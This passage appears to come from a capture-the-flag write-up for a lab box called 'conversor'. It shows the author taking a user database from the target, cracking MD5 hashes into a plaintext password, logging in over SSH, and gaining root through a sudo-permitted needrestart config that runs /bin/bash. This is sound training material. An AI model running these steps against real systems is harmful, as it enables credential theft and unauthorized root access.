            conn.execute(&#8221;INSERT INTO users (username,password) VALUES (?,?)&#8221;, (username,password))
            conn.commit()
            conn.close()
            return redirect(url_for(&#8217;login&#8217;))
        except sqlite3.IntegrityError:
            conn.close()
            return &#8220;Username already exists&#8221;
    return render_template(&#8217;register.html&#8217;)
@app.route(&#8217;/logout&#8217;)
def logout():
    session.clear()
    return redirect(url_for(&#8217;login&#8217;))


@app.route(&#8217;/about&#8217;)
def about():
 return render_template(&#8217;about.html&#8217;)

@app.route(&#8217;/login&#8217;, methods=[&#8217;GET&#8217;,&#8217;POST&#8217;])
def login():
    if request.method == &#8216;POST&#8217;:
        username = request.form[&#8217;username&#8217;]
        password = hashlib.md5(request.form[&#8217;password&#8217;].encode()).hexdigest()
        conn = get_db()
        cur = conn.cursor()
        cur.execute(&#8221;SELECT * FROM users WHERE username=? AND password=?&#8221;, (username,password))
        user = cur.fetchone()
        conn.close()
        if user:
            session[&#8217;user_id&#8217;] = user[&#8217;id&#8217;]
            session[&#8217;username&#8217;] = username
            return redirect(url_for(&#8217;index&#8217;))
        else:
            return &#8220;Invalid credentials&#8221;
    return render_template(&#8217;login.html&#8217;)


@app.route(&#8217;/convert&#8217;, methods=[&#8217;POST&#8217;])
def convert():
    if &#8216;user_id&#8217; not in session:
        return redirect(url_for(&#8217;login&#8217;))
    xml_file = request.files[&#8217;xml_file&#8217;]
    xslt_file = request.files[&#8217;xslt_file&#8217;]
    from lxml import etree
    xml_path = os.path.join(UPLOAD_FOLDER, xml_file.filename)
    xslt_path = os.path.join(UPLOAD_FOLDER, xslt_file.filename)
    xml_file.save(xml_path)
    xslt_file.save(xslt_path)
    try:
        parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False)
        xml_tree = etree.parse(xml_path, parser)
        xslt_tree = etree.parse(xslt_path)
        transform = etree.XSLT(xslt_tree)
        result_tree = transform(xml_tree)
        result_html = str(result_tree)
        file_id = str(uuid.uuid4())
        filename = f&#8221;{file_id}.html&#8221;
        html_path = os.path.join(UPLOAD_FOLDER, filename)
        with open(html_path, &#8220;w&#8221;) as f:
            f.write(result_html)
        conn = get_db()
        conn.execute(&#8221;INSERT INTO files (id,user_id,filename) VALUES (?,?,?)&#8221;, (file_id, session[&#8217;user_id&#8217;], filename))
        conn.commit()
        conn.close()
        return redirect(url_for(&#8217;index&#8217;))
    except Exception as e:
        return f&#8221;Error: {e}&#8221;

@app.route(&#8217;/view/&lt;file_id&gt;&#8217;)
def view_file(file_id):
    if &#8216;user_id&#8217; not in session:
        return redirect(url_for(&#8217;login&#8217;))
    conn = get_db()
    cur = conn.cursor()
    cur.execute(&#8221;SELECT * FROM files WHERE id=? AND user_id=?&#8221;, (file_id, session[&#8217;user_id&#8217;]))
    file = cur.fetchone()
    conn.close()
    if file:
        return send_from_directory(UPLOAD_FOLDER, file[&#8217;filename&#8217;])
    return &#8220;File not found&#8221;
www-data@conversor:~/conversor.htb$ </code></pre><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ujcc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ujcc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png 424w, https://substackcdn.com/image/fetch/$s_!ujcc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png 848w, https://substackcdn.com/image/fetch/$s_!ujcc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png 1272w, https://substackcdn.com/image/fetch/$s_!ujcc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ujcc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png" width="1830" height="815" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:815,&quot;width&quot;:1830,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:267337,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F41b2f66a-5e77-4096-929c-fae041cfa1e7_1910x874.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ujcc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png 424w, https://substackcdn.com/image/fetch/$s_!ujcc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png 848w, https://substackcdn.com/image/fetch/$s_!ujcc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png 1272w, https://substackcdn.com/image/fetch/$s_!ujcc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7ab535-f0f6-4856-8ef1-7128f220b4cf_1830x815.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>As you can see, there&#8217;s a Cronn and Database mechanism, should&#8217;ve some credentials inside.</p><p>So that&#8217;s could be our Potential for PrivEsc to User:</p><pre><code>www-data@conversor:~/conversor.htb$ ls
app.py  app.wsgi  instance  __pycache__  scripts  static  templates  uploads
www-data@conversor:~/conversor.htb$ cd uploads
www-data@conversor:~/conversor.htb/uploads$ ls
00cfcc4d-0a8e-43ad-b612-e3662f0f3577.html  exploit.xml
1ca48bd5-7016-4545-83b1-69e048f38dc7.html  exploit.xslt
70927e1b-bc1f-408b-bf6c-206cd2a257b2.html  test.xml
90ec9e53-4de0-43a8-bb2c-4625ce2ab1e1.html  test.xslt
ea464f2a-119e-4ce1-b839-028c9d466d34.html
www-data@conversor:~/conversor.htb/uploads$ cd ..
www-data@conversor:~/conversor.htb$ cd instance
www-data@conversor:~/conversor.htb/instance$ ls
users.db
www-data@conversor:~/conversor.htb/instance$ </code></pre><p>Found em:</p><pre><code>users.db</code></pre><pre><code>www-data@conversor:~/conversor.htb/instance$ sqlite3 -h
sqlite3: Error: unknown option: -h
Use -help for a list of options.
www-data@conversor:~/conversor.htb/instance$ sqlite -h
Command &#8216;sqlite&#8217; not found, but can be installed with:
apt install sqlite
Please ask your administrator.
www-data@conversor:~/conversor.htb/instance$ apt install sqlite
E: Could not open lock file /var/lib/dpkg/lock-frontend - open (13: Permission denied)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), are you root?
www-data@conversor:~/conversor.htb/instance$ </code></pre><p>Can&#8217;t do it from here, but we can Transfer it back to our attacker machine since this box have Python server.</p><ol start="4"><li><p><em>SQL Database Enumeration</em></p></li></ol><p>Let&#8217;s get it:</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo wget http://10.10.11.92:8000/users.db
--2025-10-26 03:52:55--  http://10.10.11.92:8000/users.db
Connecting to 10.10.11.92:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K) [application/octet-stream]
Saving to: &#8216;users.db&#8217;

users.db                                                   100%[========================================================================================================================================&gt;]  24.00K  93.5KB/s    in 0.3s    

2025-10-26 03:52:55 (93.5 KB/s) - &#8216;users.db&#8217; saved [24576/24576]

                                                                                                                                                                                                                                            
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ls -al
total 60
drwxr-xr-x   6 root root  4096 Oct 26 03:52 .
drwxr-xr-x 118 root root  4096 Oct 26 02:58 ..
drwxr-xr-x   2 root root  4096 Oct 26 02:58 db
-rw-r--r--   1 root root    46 Oct 26 03:06 exploit.xml
-rw-r--r--   1 root root   643 Oct 26 03:06 exploit.xslt
drwxr-xr-x   2 root root  4096 Oct 26 03:00 nmap
-rw-r--r--   1 root root   216 Oct 26 03:26 test.xslt
drwxr-xr-x   2 root root  4096 Oct 26 02:58 upload
-rw-r--r--   1 root root 24576 Oct 26 03:47 users.db
drwxr-xr-x   2 root root  4096 Oct 26 02:58 www
                                                                                                                                                                                                                                            
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ </code></pre><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo sqlite3 users.db 
SQLite version 3.46.1 2024-08-13 09:16:08
Enter &#8220;.help&#8221; for usage hints.
sqlite&gt; </code></pre><p>That took too much time to run, let&#8217;s just fire up:</p><pre><code>for t in $(sqlite3 users.db "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name;"); do echo "== $t =="; sqlite3 -header -column users.db "SELECT * FROM '$t' LIMIT 20;"; echo; done</code></pre><p>Result:</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ for t in $(sqlite3 users.db "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name;"); do echo "== $t =="; sqlite3 -header -column users.db "SELECT * FROM '$t' LIMIT 20;"; echo; done
== files ==
id                                    user_id  filename                                 
------------------------------------  -------  -----------------------------------------
8374be69-0931-4445-8f58-5589d27ec7d7  2        8374be69-0931-4445-8f58-5589d27ec7d7.html
a10bcb29-b9c0-4b3d-99aa-c4f0e8afd4e2  2        a10bcb29-b9c0-4b3d-99aa-c4f0e8afd4e2.html
89af2dd2-48b2-41b5-a2ba-e2c7a20b2a8b  2        89af2dd2-48b2-41b5-a2ba-e2c7a20b2a8b.html
00508ffa-82dd-4c42-9867-7dd4a6b16605  2        00508ffa-82dd-4c42-9867-7dd4a6b16605.html
0facc6c2-7625-4240-9dd0-d1085335224c  3        0facc6c2-7625-4240-9dd0-d1085335224c.html
f06dc183-e13f-4f4c-8389-7e414d7fe573  3        f06dc183-e13f-4f4c-8389-7e414d7fe573.html
c3f1ec9b-1b2c-49d2-96a6-33aff7028391  3        c3f1ec9b-1b2c-49d2-96a6-33aff7028391.html
1363be8b-c6c8-4227-92cc-1367b434fb14  4        1363be8b-c6c8-4227-92cc-1367b434fb14.html
1ca48bd5-7016-4545-83b1-69e048f38dc7  6        1ca48bd5-7016-4545-83b1-69e048f38dc7.html
70927e1b-bc1f-408b-bf6c-206cd2a257b2  6        70927e1b-bc1f-408b-bf6c-206cd2a257b2.html
00cfcc4d-0a8e-43ad-b612-e3662f0f3577  6        00cfcc4d-0a8e-43ad-b612-e3662f0f3577.html
90ec9e53-4de0-43a8-bb2c-4625ce2ab1e1  6        90ec9e53-4de0-43a8-bb2c-4625ce2ab1e1.html
ea464f2a-119e-4ce1-b839-028c9d466d34  6        ea464f2a-119e-4ce1-b839-028c9d466d34.html

== sqlite_sequence ==
name   seq
-----  ---
users  7  

== users ==
id  username    password                        
--  ----------  --------------------------------
1   fismathack  5b5c3ac3a1c897c94caad48e6c71fdec
5   kali        173504eca0567d0343148269ae797fa7
6   anakayam    729836b5042724dc00a048f49bc23721
7   salom       fb8c7016c412609e9fca4e65bb5e41f4</code></pre><pre><code>5b5c3ac3a1c897c94caad48e6c71fdec
173504eca0567d0343148269ae797fa7
729836b5042724dc00a048f49bc23721
fb8c7016c412609e9fca4e65bb5e41f4</code></pre><p>Great, and I believe we gain User fismathack also:</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ hashid hash.txt 
--File &#8216;hash.txt&#8217;--
Analyzing &#8216;5b5c3ac3a1c897c94caad48e6c71fdec&#8217;
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 
Analyzing &#8216;173504eca0567d0343148269ae797fa7&#8217;
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 
Analyzing &#8216;729836b5042724dc00a048f49bc23721&#8217;
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 
Analyzing &#8216;fb8c7016c412609e9fca4e65bb5e41f4&#8217;
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 
--End of file &#8216;hash.txt&#8217;--</code></pre><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tdo0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tdo0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png 424w, https://substackcdn.com/image/fetch/$s_!tdo0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png 848w, https://substackcdn.com/image/fetch/$s_!tdo0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png 1272w, https://substackcdn.com/image/fetch/$s_!tdo0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tdo0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png" width="1419" height="795" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:795,&quot;width&quot;:1419,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:201434,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba92e0fe-d655-4d19-a61f-bb1e0339388e_1419x795.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tdo0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png 424w, https://substackcdn.com/image/fetch/$s_!tdo0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png 848w, https://substackcdn.com/image/fetch/$s_!tdo0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png 1272w, https://substackcdn.com/image/fetch/$s_!tdo0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eebc253-4d24-4c44-b0b2-ccb2a8dccb12_1419x795.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Credential:</p><pre><code>User: fismathack
Passwd: Keepmesafeandwarm</code></pre><ol start="5"><li><p><em>PrivEsc to System root</em></p></li></ol><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ netexec ssh conversor.htb -u fismathack -p Keepmesafeandwarm 
SSH         10.10.11.92     22     conversor.htb    [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
SSH         10.10.11.92     22     conversor.htb    [+] fismathack:Keepmesafeandwarm  Linux - Shell access!</code></pre><p>So it&#8217;s correct and we can get a Shell from it:</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo ssh fismathack@conversor.htb
fismathack@conversor.htb&#8217;s password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-160-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of 

  System load:  0.0               Processes:             220
  Usage of /:   64.9% of 5.78GB   Users logged in:       0
  Memory usage: 8%                IPv4 address for eth0: 10.10.11.92
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: 
fismathack@conversor:~$ </code></pre><p>Enumeration again as User:</p><pre><code>fismathack@conversor:~$ id
uid=1000(fismathack) gid=1000(fismathack) groups=1000(fismathack)
fismathack@conversor:~$ groups
fismathack
fismathack@conversor:~$ sudo -i
[sudo] password for fismathack: 
Sorry, user fismathack is not allowed to execute &#8216;/bin/bash&#8217; as root on conversor.
fismathack@conversor:~$ sudo su
[sudo] password for fismathack: 
Sorry, user fismathack is not allowed to execute &#8216;/usr/bin/su&#8217; as root on conversor.
fismathack@conversor:~$ sudo -l
Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart
fismathack@conversor:~$ </code></pre><p>And we hit a Jack-pot.</p><pre><code>fismathack@conversor:~$ needrestart -h
Unknown option: h
Usage:

  needrestart [-vn] [-c &lt;cfg&gt;] [-r &lt;mode&gt;] [-f &lt;fe&gt;] [-u &lt;ui&gt;] [-(b|p|o)] [-klw]

    -v          be more verbose
    -q          be quiet
    -m &lt;mode&gt;   set detail level
        e       (e)asy mode
        a       (a)dvanced mode
    -n          set default answer to &#8216;no&#8217;
    -c &lt;cfg&gt;    config filename
    -r &lt;mode&gt;   set restart mode
        l       (l)ist only
        i       (i)nteractive restart
        a       (a)utomatically restart
    -b          enable batch mode
    -p          enable nagios plugin mode
    -o          enable OpenMetrics output mode, implies batch mode, cannot be used simultaneously with -p
    -f &lt;fe&gt;     override debconf frontend (DEBIAN_FRONTEND, debconf(7))
    -t &lt;seconds&gt; tolerate interpreter process start times within this value
    -u &lt;ui&gt;     use preferred UI package (-u ? shows available packages)

  By using the following options only the specified checks are performed:
    -k          check for obsolete kernel
    -l          check for obsolete libraries
    -w          check for obsolete CPU microcode

    --help      show this help
    --version   show version information

fismathack@conversor:~$ </code></pre><p>I think we can just implant bash script into it, then get UID root access after.</p><p>Yeah, I think we can do that,</p><pre><code>fismathack@conversor:~$ cd /tmp
fismathack@conversor:/tmp$ ls
systemd-private-eaeead5c72d84b99b5f3889af7689733-apache2.service-sG95uZ         systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-resolved.service-KEijRT
systemd-private-eaeead5c72d84b99b5f3889af7689733-ModemManager.service-TlseTS    systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-timesyncd.service-Bq6aKY
systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-logind.service-lHSkFV  vmware-root_793-4248746047
fismathack@conversor:/tmp$ </code></pre><p>So this are our payloads:</p><pre><code>echo &#8216;system(&#8221;/bin/bash&#8221;);&#8217; &gt; /tmp/root.sh
sudo /usr/sbin/needrestart -c /tmp/root.sh</code></pre><pre><code>fismathack@conversor:/tmp$ echo &#8216;system(&#8221;/bin/bash&#8221;);&#8217; &gt; /tmp/root.sh
fismathack@conversor:/tmp$ ls
root.sh                                                                       systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-logind.service-lHSkFV     vmware-root_793-4248746047
systemd-private-eaeead5c72d84b99b5f3889af7689733-apache2.service-sG95uZ       systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-resolved.service-KEijRT
systemd-private-eaeead5c72d84b99b5f3889af7689733-ModemManager.service-TlseTS  systemd-private-eaeead5c72d84b99b5f3889af7689733-systemd-timesyncd.service-Bq6aKY
fismathack@conversor:/tmp$ sudo /usr/sbin/needrestart -c /tmp/root.sh
root@conversor:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@conversor:/tmp# whoami
root
root@conversor:/tmp# </code></pre><p>Welp, that is it. We&#8217;re now a root access,</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tUsc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tUsc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png 424w, https://substackcdn.com/image/fetch/$s_!tUsc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png 848w, https://substackcdn.com/image/fetch/$s_!tUsc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png 1272w, https://substackcdn.com/image/fetch/$s_!tUsc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tUsc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png" width="1313" height="328" 